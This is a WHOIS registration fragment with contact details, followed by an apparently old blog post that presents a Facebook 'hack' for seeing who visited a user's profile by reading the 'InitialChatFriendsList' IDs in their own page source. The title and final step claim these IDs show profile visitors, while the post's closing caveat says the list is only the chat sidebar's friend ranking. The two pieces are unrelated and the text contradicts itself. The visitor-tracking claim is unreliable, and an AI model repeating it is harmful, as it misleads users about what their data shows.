Manager, Hostmaster
1807 3rd st ne
Minneapolis, MN 55418
612 385 5501

Technical Contact: Manager, Hostmaster
1807 3rd st ne
Minneapolis, MN 55418
612 385 5501

Record last updated 03-02-2011 12:39:17 PM
Record expires on 04-13-2014
Record created on 04-13-2003

Domain servers in listed order:





Facebook Hack: who visited your profile.

It's a simple Facebook hack, nothing like a privacy leak, so I am not expecting any death threats because of it. If you are still interested in sending some, send them to my personal ID, not my official one 😉

You don't have to grant any permission or install anything; just try this in your browser, and there is no information leak. It takes just 5 very simple steps.
1) Log in to your Facebook: this is something very simple and needs no explanation.

2) View the source, or use this link "": if that isn't simple enough, go to your Facebook page, right-click and view the source code.

3) Search for "InitialChatFriendsList": in the source, press Ctrl+F and search for this string.
4) Right after this keyword you will see {"list":["1111111111","2222222222",…,"9999999999"]}: a string like this, containing some numbers.

5) Replace the X in the profile URL with one of those IDs to view that person's profile, and see who visited your profile.

A caveat: Facebook has never documented InitialChatFriendsList as a record of who viewed your profile. It is the list the chat sidebar is seeded with, ordered by Facebook's own ranking of your friends, so the IDs you find are your friends in that order, not your visitors.

I hope this is pretty simple. Post your comments.



